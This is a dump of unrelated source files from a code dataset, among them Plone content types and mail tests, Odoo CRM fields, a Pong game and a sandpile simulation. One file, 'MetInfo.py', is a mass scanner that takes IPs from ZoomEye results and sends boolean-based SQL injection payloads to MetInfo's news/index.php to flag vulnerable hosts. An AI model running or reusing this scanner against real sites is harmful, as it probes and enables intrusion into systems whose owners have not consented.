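draws = [alias_draw(J, q) for _ in range(100000)]
freqs = np.bincount(draws, minlength=len(probs)) / float(len(draws))
print(freqs)  # should be close to [0.1, 0.2, 0.7]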
-*-\n \n atapi.StringField(\n name='kicker',\n searchable=True,\n widget=atapi.StringWidget(\n label=_(u\"Kicker\"),\n ),\n required=True,\n ),\n \n atapi.ReferenceField(\n name='images',\n allowed_portal_types=('Image'),\n relationship='imageattachment',\n multiValued=True,\n widget=UploadReferenceWidget(\n label=_(u\"Images\"),\n description=_(u\"Upload or select existing images.\"),\n startup_directory='/images',\n ),\n ),\n \n atapi.StringField(\n name='imageCaption',\n searchable=True,\n widget=atapi.StringWidget(\n label=_(u\"Caption\"),\n ),\n ),\n \n atapi.StringField(\n name='imageSource',\n widget=atapi.StringWidget(\n label=_(u\"Image Source\"),\n description=_(u\"Name of exernal image source.\"),\n ),\n ),\n \n atapi.StringField(\n name='imageSourceUrl',\n widget=atapi.StringWidget(\n label=_(u\"Image Source URL\"),\n description=_(u\"URL of external image source.\"),\n ),\n ),\n \n atapi.TextField(\n name='text',\n searchable=True,\n default_output_type='text/x-html-safe',\n validators=('isTidyHtmlWithCleanup'),\n widget=atapi.RichWidget(\n label=_(u\"Text\"),\n description=_(u\"Text that will be displayed above the content ad.\"),\n allow_file_upload=False,\n rows=15,\n ),\n required=True,\n ),\n \n atapi.TextField(\n name='textBottom',\n searchable=True,\n default_output_type='text/x-html-safe',\n validators=('isTidyHtmlWithCleanup'),\n widget=atapi.RichWidget(\n label=_(u\"Text Bottom\"),\n description=_(u\"Text that will be displayed below the content ad.\"),\n allow_file_upload=False,\n rows=25,\n ),\n required=False,\n ),\n \n \n atapi.ReferenceField(\n name='files',\n allowed_portal_types=('Files'),\n relationship='fileattachment',\n multiValued=True,\n widget=UploadReferenceWidget(\n label=_(u\"File Attachments\"),\n description=_(u\"File attachments associated with this article, e.g. 
a printed version that should be available for download.\"),\n startup_directory='/files',\n ),\n ),\n\n))\n\n# Set storage on fields copied from ATContentTypeSchema, making sure\n# they work well with the python bridge properties.\n# NOTE: we set storage on our custom fields as well - this could have\n# been done in the field declarations, but keeping things in one central\n# place helps keeping track [Chris]\n\nArticleSchema['title'].storage = atapi.AnnotationStorage()\nArticleSchema['description'].storage = atapi.AnnotationStorage()\nArticleSchema['description'].widget.label = _(u\"Teaser\")\nArticleSchema['description'].widget.description = _(u\"\")\nArticleSchema['kicker'].storage = atapi.AnnotationStorage()\nArticleSchema['images'].storage = atapi.AnnotationStorage()\nArticleSchema['imageCaption'].storage = atapi.AnnotationStorage()\nArticleSchema['imageSource'].storage = atapi.AnnotationStorage()\nArticleSchema['imageSourceUrl'].storage = atapi.AnnotationStorage()\nArticleSchema['text'].storage = atapi.AnnotationStorage()\nArticleSchema['textBottom'].storage = atapi.AnnotationStorage()\nArticleSchema['files'].storage = atapi.AnnotationStorage()\n\nschemata.finalizeATCTSchema(ArticleSchema, moveDiscussion=False)\n\nclass Article(base.ATCTContent):\n \"\"\"A basic article as a substitute for default document\"\"\"\n implements(IArticle)\n\n portal_type = \"Article\"\n _at_rename_after_creation = True\n \n schema = ArticleSchema\n \n # Reorder fields in ArticleSchema\n schema.moveField('kicker', before='title')\n \n\n # Map Python properties to Archetype schema\n kicker = atapi.ATFieldProperty('kicker')\n title = atapi.ATFieldProperty('title')\n description = atapi.ATFieldProperty('description')\n images = atapi.ATReferenceFieldProperty('images')\n image_caption = atapi.ATFieldProperty('imageCaption')\n image_source = atapi.ATFieldProperty('imageSource')\n image_url = atapi.ATFieldProperty('imageSourceUrl')\n text = atapi.ATFieldProperty('text')\n text_bottom = atapi.ATFieldProperty('textBottom')\n files = atapi.ATReferenceFieldProperty('files')\n\natapi.registerType(Article, PROJECTNAME)\n","sub_path":"src/weka.content/weka/content/content/article.py","file_name":"article.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"561879761","text":"#!/bin/env python\n#encoding:utf-8\n\nimport re\nimport sys\nsys.path.append(\"../../\")\nimport urllib2\nimport json\nimport pickle,pprint\n\nfrom lib.core.data import logger\n\n\ndef readSearchResult(file):\n\tf = open(file,\"rb\")\n\tdata = pickle.load(f)\n\t#pprint.pprint(data)\n\tf.close()\n\treturn data\n\ndef attack(url):\n\ta = \"http://{target}/news/index.php?\".format(target=url)\n\n\tplayLoadTrue = \"http://{target}/news/index.php?\"\\\n\t\t\t\"search_sql=%20123qwe%20\"\\\n\t\t\t\"where%201234%3D1234%20--%20x&imgproduct=xxxx\".format(target=url)\n\n\tplayLoadFalse = \"http://{target}/news/index.php?\"\\\n\t\t\t\"serch_sql=%20123qwe%20\"\\\n\t\t\t\"where%201234%3D1235%20--%20x&imgproduct=xxxx\".format(target=url)\n\ttry:\n\t\treq = urllib2.Request(playLoadTrue)\n\t\tresp = urllib2.urlopen(req)\n\t\tif resp.code != 200:\n\t\t\treturn\n\t\tdata_true = resp.read()\n\n\t\t#print data_true\n\t\tif not re.search(r'href=[\"\\' ]shownews\\.php\\?lang=', data_true, re.M):\n\t\t\t\treturn\n\n\t\treq = urllib2.Request(playLoadFalse)\n\t\tresp = urllib2.urlopen(req)\n\t\tif resp.code != 200:\n\t\t\treturn\n\t\tdata_false = resp.read()\n\t\t#print 
data_false\n\n\t\tif re.search(r'href=[\"\\' ]shownews\\.php\\?lang=', data_false, re.M):\n\t\t\treturn\n\n\t\tlogger.info(\"%s is vulnerable!\" % url)\n\texcept:\n\t\tpass\n\ndef main(file):\n\tlogger.info(\"Attack module MetInfo is running\")\n\tip_list = []\n\tdata = readSearchResult(file)\n\tfor x in data['matches']:\n\t\tlogger.info(\"find ip:{0}\".format( x['ip']))\n\t\tip_list.append(x['ip'])\n\tfor ip in ip_list:\n\t\tattack(ip)\n","sub_path":"app-sim/src/app/zoomeye/MetInfo.py","file_name":"MetInfo.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"634275940","text":"# Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the \n# sum of the first 100 numbers. \ndef sumSquare():\n list1 = []\n x = 1\n # made list of 1-100\n for i in range(100):\n list1.append(x)\n x += 1\n # made list with 1-100 squared\n squares = []\n for number in list1:\n squares.append(pow(number, 2))\n sumOfSquares = sum(squares)\n # squaring the sum of the list of 1-100\n squareOfSum = pow(sum(list1), 2)\n print(squareOfSum - sumOfSquares)\nsumSquare()\n","sub_path":"SeeTheSaenz/standardlibrary/euler1-10/euler6.py","file_name":"euler6.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"407803725","text":"# -*- coding: UTF-8 -*-\n\nfrom email.MIMEText import MIMEText\nfrom zope.component import getUtility, getMultiAdapter, getSiteManager\nfrom zope.component.interfaces import IObjectEvent\nfrom zope.interface import implements\n\nfrom plone.app.contentrules.rule import Rule\nfrom plone.app.contentrules.tests.base import ContentRulesTestCase\nfrom plone.contentrules.engine.interfaces import IRuleStorage\nfrom plone.contentrules.rule.interfaces import IRuleAction, IExecutable\nfrom collective.contentrules.mailfromfield.actions.mail import MailFromFieldAction\nfrom collective.contentrules.mailfromfield.actions.mail import MailFromFieldEditForm, MailFromFieldAddForm\n\nfrom Products.MailHost.interfaces import IMailHost\nfrom Products.SecureMailHost.SecureMailHost import SecureMailHost\n\n# basic test structure copied from plone.app.contentrules test_action_mail.py\n\n\nclass DummyEvent(object):\n implements(IObjectEvent)\n\n def __init__(self, object):\n self.object = object\n\n\nclass DummySecureMailHost(SecureMailHost):\n meta_type = 'Dummy secure Mail Host'\n\n def __init__(self, id):\n self.id = id\n self.sent = []\n\n def _send(self, mfrom, mto, messageText, debug=False):\n self.sent.append(messageText)\n\n\nclass TestMailAction(ContentRulesTestCase):\n\n def afterSetUp(self):\n self.setRoles(('Manager', ))\n self.portal.invokeFactory('Folder', 'target', title=unicode('Càrtella', 'utf-8'))\n self.portal.target.invokeFactory('Document', 'd1', title=unicode('Dòcumento', 'utf-8'))\n self.folder = self.portal.target\n\n def testRegistered(self):\n element = getUtility(IRuleAction, name='plone.actions.MailFromField')\n self.assertEquals('plone.actions.MailFromField', element.addview)\n self.assertEquals('edit', element.editview)\n self.assertEquals(None, element.for_)\n self.assertEquals(IObjectEvent, element.event)\n\n def testInvokeAddView(self):\n element = getUtility(IRuleAction, name='plone.actions.MailFromField')\n storage = getUtility(IRuleStorage)\n storage[u'foo'] = Rule()\n rule = self.portal.restrictedTraverse('++rule++foo')\n\n adding = 
getMultiAdapter((rule, self.portal.REQUEST), name='+action')\n addview = getMultiAdapter((adding, self.portal.REQUEST),\n name=element.addview)\n self.failUnless(isinstance(addview, MailFromFieldAddForm))\n\n addview.createAndAdd(data={'subject': 'My Subject',\n 'source': 'foo@bar.be',\n 'fieldName': 'foo',\n 'target': 'object',\n 'message': 'Hey, Oh!'})\n\n e = rule.actions[0]\n self.failUnless(isinstance(e, MailFromFieldAction))\n self.assertEquals('My Subject', e.subject)\n self.assertEquals('foo@bar.be', e.source)\n self.assertEquals('foo', e.fieldName)\n self.assertEquals('object', e.target)\n self.assertEquals('Hey, Oh!', e.message)\n\n def testInvokeEditView(self):\n element = getUtility(IRuleAction, name='plone.actions.MailFromField')\n e = MailFromFieldAction()\n editview = getMultiAdapter((e, self.folder.REQUEST),\n name=element.editview)\n self.failUnless(isinstance(editview, MailFromFieldEditForm))\n\n def testExecuteNoSource(self):\n self.loginAsPortalOwner()\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.message = 'Document created !'\n e.fieldName = 'foo_attr'\n e.target = 'object'\n self.folder.foo_attr = 'member1@dummy.org'\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n self.assertRaises(ValueError, ex)\n # if we provide a site mail address this won't fail anymore\n sm.manage_changeProperties({'email_from_name': 'The Big Boss',\n 'email_from_address': 'manager@portal.be',\n })\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"The Big Boss \",\n mailSent.get('From'))\n self.assertEqual(\"Document created !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteSimpleByAttribute(self):\n self.loginAsPortalOwner()\n self.folder.foo_attr = 'member1@dummy.org'\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_attr'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteTargetByAttribute(self):\n self.loginAsPortalOwner()\n self.folder.d1.foo_attr = 'member1@dummy.org'\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_attr'\n e.target = 'target'\n e.message = u\"Còntènt 
'${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteSimpleByMethod(self):\n self.loginAsPortalOwner()\n self.folder.setDescription('member1@dummy.org')\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'Description'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteTargetByFieldName(self):\n self.loginAsPortalOwner()\n self.folder.d1.setText('member1@dummy.org')\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'text'\n e.target = 'target'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteSimpleByCMFProperty(self):\n self.loginAsPortalOwner()\n self.folder.manage_addProperty('foo_property', 'member1@dummy.org', 'string')\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_property'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n 
IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'D\\xc3\\xb2cumento' created in http://nohost/plone/target/d1 - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteFolderModify(self):\n # can happen as rules are not triggered on the rule root itself\n self.loginAsPortalOwner()\n self.folder.foo_property = 'member1@dummy.org'\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_property'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder)),\n IExecutable)\n ex()\n self.failUnless(isinstance(dummyMailHost.sent[0], MIMEText))\n mailSent = dummyMailHost.sent[0]\n self.assertEqual('text/plain; charset=\"utf-8\"',\n mailSent.get('Content-Type'))\n self.assertEqual(\"member1@dummy.org\", mailSent.get('To'))\n self.assertEqual(\"foo@bar.be\", mailSent.get('From'))\n self.assertEqual(\"C\\xc3\\xb2nt\\xc3\\xa8nt 'C\\xc3\\xa0rtella' created in http://nohost/plone/target - \"\n \"Section is 'C\\xc3\\xa0rtella' (http://nohost/plone/target) !\",\n mailSent.get_payload(decode=True))\n\n def testExecuteEmptyValue(self):\n self.loginAsPortalOwner()\n self.folder.foo_attr = ''\n sm = getSiteManager(self.portal)\n sm.unregisterUtility(provided=IMailHost)\n dummyMailHost = DummySecureMailHost('dMailhost')\n sm.registerUtility(dummyMailHost, IMailHost)\n e = MailFromFieldAction()\n e.source = \"foo@bar.be\"\n e.fieldName = 'foo_attr'\n e.target = 'object'\n e.message = u\"Còntènt '${title}' created in ${url} - Section is '${section_name}' (${section_url}) !\"\n ex = getMultiAdapter((self.folder, e, DummyEvent(self.folder.d1)),\n IExecutable)\n ex()\n self.assertEqual(dummyMailHost.sent, [])\n\n\ndef test_suite():\n from unittest import TestSuite, makeSuite\n suite = TestSuite()\n suite.addTest(makeSuite(TestMailAction))\n return suite\n","sub_path":"collective/contentrules/mailfromfield/tests/test_actions_mailfromfield.py","file_name":"test_actions_mailfromfield.py","file_ext":"py","file_size_in_byte":13590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"386353325","text":"# Runtime: 104ms\n# Your runtime beats 34.15% of python submissions.\n\nimport copy\n\nclass Solution(object):\n def combinationSum(self, candidates, target):\n \"\"\"\n :type candidates: List[int]\n :type target: int\n :rtype: List[List[int]]\n \"\"\"\n ans = []\n candidates.sort(reverse = True)\n def placeCandidate(pos, curCandidates, target):\n if target == 0: ans.append(copy.deepcopy(curCandidates))\n for i in range(pos, len(candidates)):\n if target - candidates[i] >= 0:\n curCandidates.append(candidates[i])\n placeCandidate(i, curCandidates, target - candidates[i])\n curCandidates.pop()\n placeCandidate(0, [], target)\n return 
ans\n","sub_path":"31-40/39_combination_sum.py","file_name":"39_combination_sum.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"610213527","text":"# -*- coding: utf-8 -*-\n# © 2015 Alessandro Fernandes Martini, Trustcode\n# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).\n\nfrom datetime import datetime\nfrom dateutil.parser import parse\n\nfrom odoo import api, fields, models\n\n\nclass CrmLead(models.Model):\n _inherit = 'crm.lead'\n\n days_in_current_stage = fields.Integer(string=\"Dias no estágio atual\",\n compute=\"_days_in_current_stage\",\n store=True)\n days_since_creation = fields.Integer(string=\"Dias desde a criação\",\n compute=\"_days_since_creation\",\n store=True)\n is_late = fields.Boolean(string=\"Atrasada?\", compute=\"_is_late\",\n store=True)\n\n @api.depends('date_last_stage_update')\n def _days_in_current_stage(self):\n for record in self:\n record.days_in_current_stage = (\n datetime.now() - parse(record.date_last_stage_update)).days\n\n @api.depends('create_date')\n def _days_since_creation(self):\n for record in self:\n record.days_since_creation = (\n datetime.today() - parse(record.create_date)).days\n\n @api.depends('stage_id')\n def _is_late(self):\n for record in self:\n record.is_late = record.stage_id.maximum_days < \\\n record.days_in_current_stage\n","sub_path":"crm_kanban_dates/models/crm_lead.py","file_name":"crm_lead.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"629206065","text":"import os\r\nimport sys\r\nimport math\r\nimport numpy as np\r\nfrom PIL import Image\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\nclass Viewer(object):\r\n def get_float_color(color):\r\n assert len(color) == 3, \"Цвет должен быть массивом длины 3\"\r\n R = color[0]\r\n G = color[1]\r\n B = color[2]\r\n assert 0 <= R <= 255 and 0 <= G <= 255 and 0 <= B <= 255\r\n color_zero_one = [color[0]/255, color[1]/255, color[2]/255]\r\n return color_zero_one\r\n\r\n def img_print(Number):\r\n im = Image.open(str(Number).join(('Google Colab/', '.jpg')))\r\n im.show()\r\n\r\n def draw_circle(color):\r\n plt.figure(figsize=(2, 2))\r\n plt.axis('off')\r\n plt.scatter([0], [0], s=10000, color=color)\r\n plt.show()\r\n\r\n def mean_color(picture):\r\n AVG = [0, 0, 0]\r\n for columns in np.asarray(picture):\r\n for color in columns:\r\n AVG[0] += color[0]\r\n AVG[1] += color[1]\r\n AVG[2] += color[2]\r\n\r\n Size = np.asarray(picture).shape[0] * np.asarray(picture).shape[1]\r\n AVG[0] = AVG[0] / Size\r\n AVG[1] = AVG[1] / Size\r\n AVG[2] = AVG[2] / Size\r\n return AVG\r\n\r\n def get_cropped(i, size):\r\n im = Image.open(str(i).join(('Google Colab/', '.jpg')))\r\n left, top, right, bottom = 0, 0, size[0], size[1]\r\n cropped = im.crop((left, top, right, bottom))\r\n cropped.show()\r\n\r\n def get_resized(i, size):\r\n '''im = Image.open(str(i).join(('Google Colab/', '.jpg')))\r\n image_array = np.asarray(im)\r\n python_array = []\r\n for i in xrange(0,100):\r\n python_array.append(0)\r\n\r\n image_resized = np.array(python_array)\r\n width, height = im.size # Размер картинки\r\n pixel_x = int(width / size[0])\r\n pixel_y = int(height / size[1])\r\n for line in range(size[1]):\r\n for column in range(size[0]):\r\n image_resized[line, column] = mean_color() # image_array[]'''\r\n\r\n def dist(color1, color2):\r\n dis1 = (color1[0]-color2[0]) ** 2\r\n dis2 = 
(color1[1]-color2[1]) ** 2\r\n        dis3 = (color1[2]-color2[2]) ** 2\r\n        d = (dis1 + dis2 + dis3) ** .5\r\n        return d\r\n\r\nif __name__ == \"__main__\":\r\n    # Viewer.img_print(2)\r\n    # Viewer.get_cropped(1, [50, 50])\r\n    # Viewer.get_resized(2, [640, 330])\r\n    sys.exit()\r\n","sub_path":"Google Colab/theViewer.py","file_name":"theViewer.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"25807369","text":"import pygame\nimport time\nimport os\nimport sys\nfrom Core.GameSystem import GameSystem\nfrom Core.MainMenu import MainMenu\nfrom Model.DataBase import DataBase\nfrom threading import Thread\nfrom Core.Network import NetWork\nfrom Model.DataBaseNetwork import DataBaseNetwork\nfrom Class.CommandPars import CommandPars\n\ncounter = 0\n\nuser_name = 'Игрок'\nip = 42\ncolor = 'white'\n \ndef network_core(net, mmr):\n    net.send_message({\"Type_Command\": \"Login\", \"Name_user\": user_name, \"Color\": color, \"Ip_user\": ip, \"Mmr_user\": mmr})\n    while True:\n        command = net.listener()\n        if command is not None:\n            DataBaseNetwork().add_list_command(command)\n        else:\n            break\n    net.close()\n\n\ndef game_start(co=0):\n    global user_name\n    pygame.init()\n    clock = pygame.time.Clock()\n\n    pygame.mixer.music.load(\"endofline.ogg\")\n    GameSystem().game_init()\n    pygame.display.set_caption(f'Ping-Pong 2.0 {user_name}')\n\n    while DataBase().is_playing:\n        clock.tick(120)\n        GameSystem().update_game()\n        pygame.display.update()\n\n        if co == 0:\n            pygame.mixer.music.play(-1, 0.5)\n            co += 1\n    pygame.quit()\n\n    \ndef game_menu():\n    global user_name, color\n    co = 0\n    pygame.init()\n    clock = pygame.time.Clock()\n    pygame.mixer.music.load(\"Tron_legacy_end.ogg\")\n    pygame.mixer.music.play(-1, 0.5)\n    mm = MainMenu(user_name)\n    mm.game_init()\n    pygame.mouse.set_visible(False)\n    while not DataBase().is_playing:\n        clock.tick(120)\n        mm.update_game()\n        pygame.display.update()\n        if mm.button == 'connection' and co == 0:\n            user_name = mm.player_name\n            color = ['white', 'red', 'green', 'blue', 'yellow'][mm.skin]\n            socket = NetWork()\n            socket('localhost', 2510)\n            DataBaseNetwork().attach(CommandPars())\n            Thread(target=network_core, args=(socket, 1000,), daemon=True).start()\n            co += 1\n    pygame.quit()\n\nwhile True:\n    game_menu()\n    if DataBase().is_playing:\n        game_start(counter)\n    os.execl(sys.executable, 'python', __file__, *sys.argv[1:])","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"448304178","text":"from random import randint\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom collections import Counter\n\n\n\nclass Sandpile:\n    \"\"\"\n    Class representing sandpile model for Self-Organized Criticality\n\n    variables\n    number_radial = number representing r values (must be odd number)\n    number_angles = number representing theta values\n    array = array representing sandpile with r and theta\n    max_peak = maximum sand grains on position [r][theta]\n    topple_count = sums how many topples occurred during simulation\n    mass_count = sums whole mass gathered during simulation\n    mass_fallen_count = sums mass that was 'thrown' out of the disk\n    mass_left_count = sums mass 'left' on disk\n    mass_when_iteration = array consisting of mass during every iteration\n    when_topple = array consisting of iteration when topple occurred\n\n    angles_array = angles array for plotting (required by matplotlib)\n    
radial_array = radial array for plotting (required by matplotlib)\n \"\"\"\n\n #initialization of sandpile\n def __init__(self, number_radial, number_angles, max_peak):\n \"\"\"\n Initialisation function for Sandpile class\n :param number_radial:\n :param number_angles:\n :param max_peak:\n \"\"\"\n self.number_radial = number_radial\n self.number_angles = number_angles\n self.array = np.zeros((self.number_radial, self.number_angles))\n self.max_peak = max_peak\n self.topple_count = 0\n self.mass_count = 0\n self.mass_fallen_count = 0\n self.mass_left_count = 0\n self.mass_when_iteration = []\n self.when_topple = []\n\n self.number_of_simulations = 0\n\n self.angles_array = np.linspace(0, 2 * np.pi, number_angles + 1)\n self.radial_array = np.linspace(0, number_radial, number_radial + 1)\n\n def add_grain(self, radial_position):\n \"\"\"\n Adds grain to chosen radial position and random angle position\n :param radial_position:\n :return:\n \"\"\"\n\n self.mass_count += 1\n self.array[radial_position][randint(0, self.number_angles - 1)] += 1\n\n def topple(self, radial_position, angle_position, iteration):\n \"\"\"\n Topple function, gathers data, strips current sandpile location, distributes taken grains to 3 nearby locations\n :param radial_position:\n :param angle_position:\n :param iteration:\n :return:\n \"\"\"\n #gather data\n self.topple_count += 1\n self.when_topple.append(iteration)\n #execute topple\n taken_grains = 3\n self.array[radial_position][angle_position] -= taken_grains\n\n #one grain topples downwards\n if radial_position < self.number_radial - 1:\n self.array[radial_position + 1][angle_position] += 1\n else:\n self.mass_fallen_count += 1\n\n #one grain topples LEFT\n\n if angle_position == 0:\n self.array[radial_position][self.number_angles - 1] += 1\n else:\n self.array[radial_position][angle_position - 1] += 1\n\n #one grain topples RIGHT\n\n if angle_position == self.number_angles - 1:\n self.array[radial_position][0] += 1\n else:\n self.array[radial_position][angle_position + 1] += 1\n\n def check_pile(self, iteration):\n \"\"\"\n Function checking every sandpile location, if grains of sand exceed max topple starts\n :param iteration:\n :return:\n \"\"\"\n\n for r in range(0, self.number_radial, 1):\n for theta in range(0, self.number_angles, 1):\n\n if self.array[r][theta] < self.max_peak:\n self.array[r][theta] = self.array[r][theta]\n\n else:\n self.topple(r, theta, iteration)\n\n def simulate(self, number_of_simulations):\n \"\"\"\n Main function, starts sandpile simulation\n :param number_of_simulations:\n :return:\n \"\"\"\n self.number_of_simulations = number_of_simulations\n\n for iteration_num in range(0, number_of_simulations, 1):\n self.add_grain(0)\n self.check_pile(iteration_num)\n self.mass_when_iteration.append(self.mass_count - self.mass_fallen_count)\n print(self.array)\n\n def count_mass_left(self):\n \"\"\"\n Function for counting how much mass is left on disk\n :return:\n \"\"\"\n self.mass_left_count = int(np.sum(self.array))\n\n def plot(self, type='sandpile'):\n \"\"\"\n Plotting function\n :param type:\n :return:\n \"\"\"\n\n #plot sandpile after simulation\n if type == 'sandpile':\n fig, ax = plt.subplots(subplot_kw=dict(projection='polar'))\n cb = ax.pcolormesh(self.angles_array, self.radial_array, self.array, edgecolors='k', linewidths=1)\n ax.set_yticks([])\n ax.set_theta_zero_location('N')\n ax.set_theta_direction(-1)\n plt.colorbar(cb, orientation='vertical')\n plt.show()\n\n #plot iteration / mass of left pile on plate\n if type == 
